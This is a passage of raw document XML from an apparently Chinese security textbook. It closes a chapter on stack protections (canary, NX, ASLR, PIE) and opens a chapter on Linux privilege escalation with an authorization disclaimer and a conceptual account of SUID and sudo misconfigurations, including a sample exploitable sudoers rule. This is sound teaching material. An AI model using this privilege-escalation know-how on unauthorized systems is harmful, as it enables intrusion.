        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值，然后在构造溢出数据时原样写回；或者利用一种能够写任意地址但不经过栈连续区域的方法（称为非顺序写入），从而直接修改返回地址而不接触</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">canary。这些均超出了单纯溢出漏洞的能力。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14-4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：（1）系统日志中出现大量段错误（signal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">11/SIGSEGV），且崩溃地址指向栈区或其他可疑区域，或出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__stack_chk_fail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">符号；（2）核心转储文件中，栈帧的返回地址被替换为库函数地址或奇怪的模式（如大量重复字节），且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值与原副本不一致。这些异常都可以通过自动化分析工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> crash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WinDbg）检出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="270"/>
    <w:bookmarkStart w:id="271" w:name="小结-18"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过使栈和堆不可执行，彻底终结了简单的“栈上执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode”攻击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①；但攻击者转向代码复用（ret2libc/ROP）③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在返回地址前插入检测值，使得连续的线性写溢出在修改返回地址前就会被发现并终止程序</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①；绕过需要附加的信息泄露能力③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随机化地址空间主要区域的基址，令攻击者事先无法获知所需代码地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①，从而重挫代码复用攻击；其原理依赖于虚拟内存的页表映射（见《从位到物联》Ch16）①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PIE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的随机化覆盖到主程序代码段，堵住了攻击者利用已知主程序</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的最后一条路径</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上四种机制配合编译期安全选项（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fstack-protector-strong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-pie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-z noexecstack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-D_FORTIFY_SOURCE=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）和安全编码实践，形成纵深防御，大幅提高利用难度并降低自动化攻击的成功率</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队可将崩溃监控、canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">异常和权限提升尝试作为检测栈溢出利用的可靠信号，并结合补丁管理与配置基线进行防护。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="271"/>
    <w:bookmarkStart w:id="272" w:name="延伸阅读-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Erickson，《Hacking:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> The Art of Exploitation》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：深入讲解从汇编到操作系统保护、绕过缓解的基本思想，是理解二进制攻防的经典入门书。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">《The Shellcoder’s Handbook》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：详细剖析各种操作系统的利用技术和保护机制，尽管部分内容已过时，其对攻防原理的抽象仍极具价值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">pwn.college（CTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">教学平台）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提供从零开始的二进制利用课程与配套容器化练习，完全在合法、隔离的环境中展开，非常适合配合本节学习。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="272"/>
    <w:bookmarkEnd w:id="273"/>
    <w:bookmarkStart w:id="286" w:name="linux-提权从普通用户到-root"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15 Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权:从普通用户到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="274" w:name="提权枚举与配置错误利用"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权枚举与配置错误利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在进入本节之前，读者应已掌握：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的进程模型、权限位与文件系统权限（rwx/suid）、shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的基本概念；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全链路，已获得目标系统的低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章虚拟内存与页表的基本概念（理解内核空间与用户空间的隔离为何是提权的核心前提）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在以下环境中执行：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自建的隔离实验虚拟机（VirtualBox/VMware），网络模式为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且不与生产网络连通；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方授权的渗透测试靶机平台（HackTheBox、TryHackMe、VulnHub、OffSec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Proving Grounds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">经过书面授权的真实渗透测试目标。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未经授权对他人系统执行本节所述命令属于违法行为。实验前务必创建虚拟机快照，以便操作失误后快速回滚。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权的核心直觉可以浓缩为一句话：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">系统管理员无意中赋予了某个低权限主体不应该有的高权限能力</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。从攻击者视角看，我们并非要“破坏”一个正确的系统，而是要“发现”一个配置错误的系统——某个文件拥有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位但可以被当前用户触发，某个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则过于宽泛，某个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">任务以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行却引用了用户可写的脚本。这些错误配置的本质，都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限原则（Principle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of Least </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的违反：一个本应被严格限制的主体，由于配置疏漏而获得了超出其职责所需的权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者视角看，提权的检测与修复同样围绕这一原则展开：审计每一个高权限入口点，确保它们确实“必须”高权限才能工作，移除不必要的特权，并对保留的特权实施精细化的访问控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：提权是什么，以及它为什么发生</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限模型中，一个普通用户（uid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≥ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1000）或服务账户（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）受到严格的访问控制限制：它只能读取、写入属于自己的文件，只能监听</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1024 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上的端口，不能加载内核模块，不能修改系统配置。内核通过权限检查机制确保这些限制在正常路径下不可逾越。提权（Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation），就是从这样一个受限的立足点出发，获取更高权限（通常是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0）的过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权之所以可能，是因为系统存在一个“权限缺口”——某个高权限操作的触发路径，其前置条件被当前低权限用户满足。最常见的两类缺口是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：管理员为方便操作，给某个可执行文件设置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID（Set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> User </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）位，但该文件本身存在危险功能（如可以执行任意命令的文本编辑器、可以写入任意文件的命令），导致低权限用户可以借助它执行高权限操作。同理，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中配置了过于宽松的规则（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">任务以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份调用了一个用户可写的脚本，系统服务以高权限运行但其配置文件被错误地设为可写，等等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：操作系统内核本身存在内存破坏或逻辑漏洞，低权限用户可以通过精巧的系统调用序列触发该漏洞，使内核跳转到攻击者控制的代码并以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ring 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限执行。此类漏洞属于</w:t>
      </w:r>
